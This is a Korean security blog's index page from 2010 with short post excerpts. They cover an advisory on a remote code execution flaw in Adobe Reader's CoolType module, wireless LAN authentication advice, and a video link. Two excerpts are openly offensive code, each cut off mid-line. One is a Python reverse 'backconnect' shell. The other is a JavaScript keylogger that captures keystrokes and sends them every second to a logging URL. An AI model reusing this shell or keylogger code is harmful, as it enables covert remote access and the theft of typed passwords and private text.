분류 전체보기2850 Adobe Reader/Acrobat 신규 원격코드실행 취약점 주의 □ 개요 o Adobe Reader와 Acrobat의 CoolType.dll 모듈이 잘못된 SING(Smart INdependent Glyphlets) 글꼴이 포함된 PDF문서를 처리하는 과정에서, 오버플로우가 발생하여 원격코드가 실행되는 취약점이 발견됨 [1, 2] o 공격자는 웹 페이지 은닉, 스팸 메일, 메신저의 링크 등을 통해 특수하게 조작된 PDF 문서를 사용자가 열어보도록 유도하여 악성코드 유포 가능 o Adobe Reader와 Acrobat 최신 버전에서도 해당 취약점이 존재하므로, 신뢰할 수 없는 PDF 파일을 열어보지 않는 등의 사용자 주의가 요구됨 □ 해당 시스템 o 영향 받는 소프트웨어 [1] - 윈도우, 매킨토시, 유닉스 환경에서 동작하는 Adobe Acrobat 9.3.4 및 이전.. 2010. 9. 10. 윈도우 환경 Python 쉘 리바운드 #!/usr/bin/python import socket import sys import os def usage(): print "Simple Python Backconnect Shell" print "Usage:" print "./bc.py [ip] [port]" quit() #Initialize socket s = socket.socket() #Check if required arguments have been filled try: ip = sys.argv[1] port = int(sys.argv[2]) except: usage() #Connect to given target IP & port try: s.connect((ip, port)) except: print "Connection Failed!.. 2010. 9. 10. 802.1x EAP 인증과 WPA2 적용이 최선 무선랜 사용에 따른 해킹 문제 소호 무선랜 구성의 개선 방향 - 현재 소호 무선랜은 인증 및 암호화가 적용되지 않아 매우 취약하므로 인증서버 탑재 AccessPoint로 비인가자 접속을 원천 차단하여야 함 - WPA2는 EAP-TLS/TTLS/PEAP/FAST/AKA/LEAP등의 많은 인증관련 방법을 사용할 수 있음 - 한국기술비젼이 제시한 WPA2 + TKIP/AES는 EAP-PEAP/MS-CHAPv2등의 인증 메커니즘을 통해 AP에 내장된 인증서버(Radius)의 인증과 공유키의 동적 배포를 통해 도청을 방지하고, 무선 네트워크 접속을 제어하게됨. *한국기술비젼 특허출원 [통합형 무선 통신 장치와 그의 동작 방법, 2009-99127] 기업 무선랜 구성의 개선 방향 - Enterprise 수준의 보안.. 2010. 9. 7. Automated vs. Manual Security Automated vs. Manual Security: You can't filter "The Stupid" http://blip.tv/play/AYHwpGEC 2010. 9. 6. Javascript Keylogger 예제 var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ new Image().src = 'http://localhost/junkylogger.php?keys='+keys; keys = ''; }, 1000); GM_setValue('keys', ''); unsafeWindow.onkeypress = function(e) { eventobj = window.event?event:e; key = eventobj.ke.. 2010. 9. 3. 이전 1 ··· 417 418 419 420 421 422 423 ··· 570 다음
